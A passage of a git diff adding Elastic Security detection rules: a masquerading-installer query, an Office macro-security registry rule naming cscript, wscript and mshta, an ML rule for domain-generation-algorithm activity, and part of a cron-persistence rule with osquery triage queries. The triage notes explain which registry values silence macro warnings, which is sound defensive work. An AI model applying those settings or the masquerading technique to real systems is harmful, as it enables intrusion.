(process.code_signature.subject_name == \"Zoom Video Communications, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Outlook */\n (process.name : \"*outlook*.exe\" and not\n (\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) or\n (\n process.name: \"MSOutlookHelp-PST-Viewer.exe\" and process.code_signature.subject_name == \"Aryson Technologies Pvt. Ltd\" and\n process.code_signature.trusted == true\n )\n )\n ) or\n\n /* Thunderbird */\n (process.name : \"*thunderbird*.exe\" and not\n (process.code_signature.subject_name == \"Mozilla Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Grammarly */\n (process.name : \"*grammarly*.exe\" and not\n (process.code_signature.subject_name == \"Grammarly, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Dropbox */\n (process.name : \"*dropbox*.exe\" and not\n (process.code_signature.subject_name == \"Dropbox, Inc\" and process.code_signature.trusted == true)\n ) or\n\n /* Tableau */\n (process.name : \"*tableau*.exe\" and not\n (process.code_signature.subject_name == \"Tableau Software LLC\" and process.code_signature.trusted == true)\n ) or\n\n /* Google Drive */\n (process.name : \"*googledrive*.exe\" and not\n (process.code_signature.subject_name == \"Google LLC\" and process.code_signature.trusted == true)\n ) or\n\n /* MSOffice */\n (process.name : \"*office*setup*.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Okta */\n (process.name : \"*okta*.exe\" and not\n (process.code_signature.subject_name == \"Okta, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* OneDrive */\n (process.name : \"*onedrive*.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Chrome */\n (process.name : \"*chrome*.exe\" and not\n 
(process.code_signature.subject_name in (\"Google LLC\", \"Google Inc\") and process.code_signature.trusted == true)\n ) or\n\n /* Firefox */\n (process.name : \"*firefox*.exe\" and not\n (process.code_signature.subject_name == \"Mozilla Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Edge */\n (process.name : (\"*microsoftedge*.exe\", \"*msedge*.exe\") and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Brave */\n (process.name : \"*brave*.exe\" and not\n (process.code_signature.subject_name == \"Brave Software, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* GoogleCloud Related Tools */\n (process.name : \"*GoogleCloud*.exe\" and not\n (process.code_signature.subject_name == \"Google LLC\" and process.code_signature.trusted == true)\n ) or\n\n /* Github Related Tools */\n (process.name : \"*github*.exe\" and not\n (process.code_signature.subject_name == \"GitHub, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Notion */\n (process.name : \"*notion*.exe\" and not\n (process.code_signature.subject_name == \"Notion Labs, Inc.\" and process.code_signature.trusted == true)\n )\n )\n", + "references": [ + "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, 
+ "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "feafdc51-c575-4ed2-89dd-8e20badc2d6c", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1189", + "name": "Drive-by Compromise", + "reference": "https://attack.mitre.org/techniques/T1189/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "feafdc51-c575-4ed2-89dd-8e20badc2d6c_3", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_4.json b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_4.json new file mode 100644 index 00000000000..7618b260499 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_4.json 
@@ -0,0 +1,145 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies executables with names resembling legitimate business applications but lacking signatures from the original developer. Attackers may trick users into downloading malicious executables that masquerade as legitimate applications via malicious ads, forum posts, and tutorials, effectively gaining initial access.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Masquerading as Business App Installer", + "query": "process where host.os.type == \"windows\" and\n event.type == \"start\" and process.executable : \"?:\\\\Users\\\\*\\\\Downloads\\\\*\" and\n not process.code_signature.status : (\"errorCode_endpoint*\", \"errorUntrustedRoot\", \"errorChaining\") and\n (\n /* Slack */\n (process.name : \"*slack*.exe\" and not\n (process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\",\n \"Slack Technologies, LLC\"\n ) and process.code_signature.trusted == true)\n ) or\n\n /* WebEx */\n (process.name : \"*webex*.exe\" and not\n (process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and process.code_signature.trusted == true)\n ) or\n\n /* Teams */\n (process.name : \"teams*.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Discord */\n (process.name : \"*discord*.exe\" and not\n (process.code_signature.subject_name == \"Discord Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* WhatsApp */\n (process.name : \"*whatsapp*.exe\" and not\n (process.code_signature.subject_name in (\n \"WhatsApp LLC\",\n \"WhatsApp, Inc\",\n \"24803D75-212C-471A-BC57-9EF86AB91435\"\n ) and process.code_signature.trusted == true)\n ) or\n\n /* Zoom */\n (process.name : (\"*zoom*installer*.exe\", \"*zoom*setup*.exe\", \"zoom.exe\") and not\n 
(process.code_signature.subject_name == \"Zoom Video Communications, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Outlook */\n (process.name : \"*outlook*.exe\" and not\n (\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true) or\n (\n process.name: \"MSOutlookHelp-PST-Viewer.exe\" and process.code_signature.subject_name == \"Aryson Technologies Pvt. Ltd\" and\n process.code_signature.trusted == true\n )\n )\n ) or\n\n /* Thunderbird */\n (process.name : \"*thunderbird*.exe\" and not\n (process.code_signature.subject_name == \"Mozilla Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Grammarly */\n (process.name : \"*grammarly*.exe\" and not\n (process.code_signature.subject_name == \"Grammarly, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Dropbox */\n (process.name : \"*dropbox*.exe\" and not\n (process.code_signature.subject_name == \"Dropbox, Inc\" and process.code_signature.trusted == true)\n ) or\n\n /* Tableau */\n (process.name : \"*tableau*.exe\" and not\n (process.code_signature.subject_name == \"Tableau Software LLC\" and process.code_signature.trusted == true)\n ) or\n\n /* Google Drive */\n (process.name : \"*googledrive*.exe\" and not\n (process.code_signature.subject_name == \"Google LLC\" and process.code_signature.trusted == true)\n ) or\n\n /* MSOffice */\n (process.name : \"*office*setup*.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Okta */\n (process.name : \"*okta*.exe\" and not\n (process.code_signature.subject_name == \"Okta, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* OneDrive */\n (process.name : \"*onedrive*.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Chrome */\n (process.name : \"*chrome*.exe\" and not\n 
(process.code_signature.subject_name in (\"Google LLC\", \"Google Inc\") and process.code_signature.trusted == true)\n ) or\n\n /* Firefox */\n (process.name : \"*firefox*.exe\" and not\n (process.code_signature.subject_name == \"Mozilla Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Edge */\n (process.name : (\"*microsoftedge*.exe\", \"*msedge*.exe\") and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Brave */\n (process.name : \"*brave*.exe\" and not\n (process.code_signature.subject_name == \"Brave Software, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* GoogleCloud Related Tools */\n (process.name : \"*GoogleCloud*.exe\" and not\n (process.code_signature.subject_name == \"Google LLC\" and process.code_signature.trusted == true)\n ) or\n\n /* Github Related Tools */\n (process.name : \"*github*.exe\" and not\n (process.code_signature.subject_name == \"GitHub, Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* Notion */\n (process.name : \"*notion*.exe\" and not\n (process.code_signature.subject_name == \"Notion Labs, Inc.\" and process.code_signature.trusted == true)\n )\n )\n", + "references": [ + "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, 
+ "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "feafdc51-c575-4ed2-89dd-8e20badc2d6c", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Tactic: Execution" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1189", + "name": "Drive-by Compromise", + "reference": "https://attack.mitre.org/techniques/T1189/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "feafdc51-c575-4ed2-89dd-8e20badc2d6c_4", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_107.json b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_107.json new file mode 100644 index 00000000000..50cf192d30f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/feeed87c-5e95-4339-aef1-47fd79bcfbe3_107.json 
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Microsoft Office Products offer options for users and developers to control the security settings for running and using Macros. Adversaries may abuse these security settings to modify the default behavior of the Office Application to trust future macros and/or disable security warnings, which could increase their chances of establishing persistence.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "MS Office Macro Security Registry Modifications", + "note": "## Triage and analysis\n\n### Investigating MS Office Macro Security Registry Modifications\n\nMacros are small programs that are used to automate repetitive tasks in Microsoft Office applications. Historically, macros have been used for a variety of reasons -- from automating part of a job, to building entire processes and data flows. Macros are written in Visual Basic for Applications (VBA) and are saved as part of Microsoft Office files.\n\nMacros are often created for legitimate reasons, but they can also be written by attackers to gain access, harm a system, or bypass other security controls such as application allow listing. In fact, exploitation from malicious macros is one of the top ways that organizations are compromised today. These attacks are often conducted through phishing or spear phishing campaigns.\n\nAttackers can convince victims to modify Microsoft Office security settings, so their macros are trusted by default and no warnings are displayed when they are executed. 
These settings include:\n\n- *Trust access to the VBA project object model* - When enabled, Microsoft Office will trust all macros and run any code without showing a security warning or requiring user permission.\n- *VbaWarnings* - When set to 1, Microsoft Office will trust all macros and run any code without showing a security warning or requiring user permission.\n\nThis rule looks for registry changes affecting the conditions above.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user and check if the change was done manually.\n- Verify whether malicious macros were executed after the registry change.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve recently executed Office documents and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Reset the registry key value.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Explore using GPOs to manage security settings for Microsoft Office macros.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKU\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\AccessVBOM\",\n \"HKU\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\VbaWarnings\",\n \"HKU\\\\S-1-12-1-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\AccessVBOM\",\n \"HKU\\\\S-1-12-1-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\VbaWarnings\",\n \"\\\\REGISTRY\\\\USER\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\AccessVBOM\",\n \"\\\\REGISTRY\\\\USER\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\VbaWarnings\",\n \"\\\\REGISTRY\\\\USER\\\\S-1-12-1-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\AccessVBOM\",\n 
\"\\\\REGISTRY\\\\USER\\\\S-1-12-1-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\VbaWarnings\"\n ) and\n registry.data.strings : (\"0x00000001\", \"1\") and\n process.name : (\"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"mshta.exe\", \"winword.exe\", \"excel.exe\")\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "feeed87c-5e95-4339-aef1-47fd79bcfbe3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": 
"https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1204", + "name": "User Execution", + "reference": "https://attack.mitre.org/techniques/T1204/", + "subtechnique": [ + { + "id": "T1204.002", + "name": "Malicious File", + "reference": "https://attack.mitre.org/techniques/T1204/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "feeed87c-5e95-4339-aef1-47fd79bcfbe3_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_3.json b/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_3.json new file mode 100644 index 00000000000..c41dcf07e1d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff0d807d-869b-4a0d-a493-52bc46d2f1b1_3.json 
@@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A population analysis machine learning job detected potential DGA (domain generation algorithm) activity. Such activity is often used by malware command and control (C2) channels. This machine learning job looks for a source IP address making DNS requests that have an aggregate high probability of being DGA activity.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "dga_high_sum_probability", + "name": "Potential DGA Activity", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/dga", + "https://www.elastic.co/security-labs/detect-domain-generation-algorithm-activity-with-new-kibana-integration" + ], + "related_integrations": [ + { + "package": "dga", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "risk_score": 21, + "rule_id": "ff0d807d-869b-4a0d-a493-52bc46d2f1b1", + "setup": "## Setup\n\nThe rule requires the Domain Generation Algorithm (DGA) Detection integration assets to be installed, as well as DNS events collected by integrations such as Elastic Defend, Network Packet Capture, or Packetbeat. 
\n\n### DGA Detection Setup\nThe DGA Detection integration consists of an ML-based framework to detect DGA activity in DNS events.\n\n#### Prerequisite Requirements:\n- Fleet is required for DGA Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- DNS events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint), [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration, or [Packetbeat](https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n- To set up and run Packetbeat, follow [this](https://www.elastic.co/guide/en/beats/packetbeat/current/setting-up-and-running.html) guide.\n\n#### The following steps should be executed to install assets associated with the DGA Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Domain Generation Algorithm Detection and select the integration to see more details about it.\n- Under Settings, click Install Domain Generation Algorithm Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich DNS events with predictions from the Supervised DGA Detection model. 
This is done via the ingest pipeline named `-ml_dga_ingest_pipeline` installed with the DGA Detection package.\n- If using an Elastic Beat such as Packetbeat, add the DGA ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `packetbeat.yml`.\n- If adding the DGA ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the DGA ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"ml_is_dga\": {\n \"properties\": {\n \"malicious_prediction\": {\n \"type\": \"long\"\n },\n \"malicious_probability\": {\n \"type\": \"float\"\n }\n }\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched DNS events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `logs-network_traffic.*` if you used Network Packet Capture.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/dga/kibana/ml_module/dga-ml.json) configuration file, you will see a card for DGA under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Use Case: Domain Generation Algorithm Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "ff0d807d-869b-4a0d-a493-52bc46d2f1b1_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_9.json b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_9.json new file mode 100644 index 00000000000..add59f0b981 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff10d4d8-fea7-422d-afb1-e5a2702369a9_9.json 
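Review bot: The `setup` text tells users to attach "the ingest pipeline named `-ml_dga_ingest_pipeline`", and the leading hyphen looks like a version prefix that was dropped when the text was generated, so the name as printed will not resolve. It should either give the full name the DGA package installs (e.g. `<dga-package-version>-ml_dga_ingest_pipeline`, placeholder) or tell the reader to look it up under Stack Management → Ingest Pipelines rather than copy the literal. Separately, `tags` lists both `Rule Type: ML` and `Rule Type: Machine Learning`; if one is being phased out that is fine, but nothing in the file says so. The "Anomaly Detection Setup" paragraph also ends with a trailing space before `\n` (`job. \n`), which is cosmetic only.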
@@ -0,0 +1,157 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Linux cron jobs are scheduled tasks that can be leveraged by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Cron Job Created or Changed by Previously Unknown Process", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating Cron Job Created or Changed by Previously Unknown Process\nLinux cron jobs are scheduled tasks that run at specified intervals or times, managed by the cron daemon. \n\nBy creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.\n\nThis rule monitors the creation of previously unknown cron jobs by monitoring for file creation events in the most common cron job task location directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the cron job file that was created or modified.\n- Investigate whether any other files in any of the available cron job directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\n path LIKE '/etc/cron.allow.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/cron.hourly/%' OR\\n path LIKE '/etc/cron.daily/%' OR\\n path LIKE '/etc/cron.weekly/%' OR\\n path LIKE '/etc/cron.monthly/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve rc-local.service File Information\",\"query\":\"SELECT * FROM file WHERE (\\n path = '/etc/cron.allow' OR\\n path = '/etc/cron.deny' OR\\n path = '/etc/crontab' OR\\n path = '/usr/sbin/cron' OR\\n path = '/usr/sbin/anacron'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\n path LIKE '/etc/cron.allow.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/cron.hourly/%' OR\\n path LIKE '/etc/cron.daily/%' OR\\n path LIKE '/etc/cron.weekly/%' OR\\n path LIKE '/etc/cron.monthly/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, 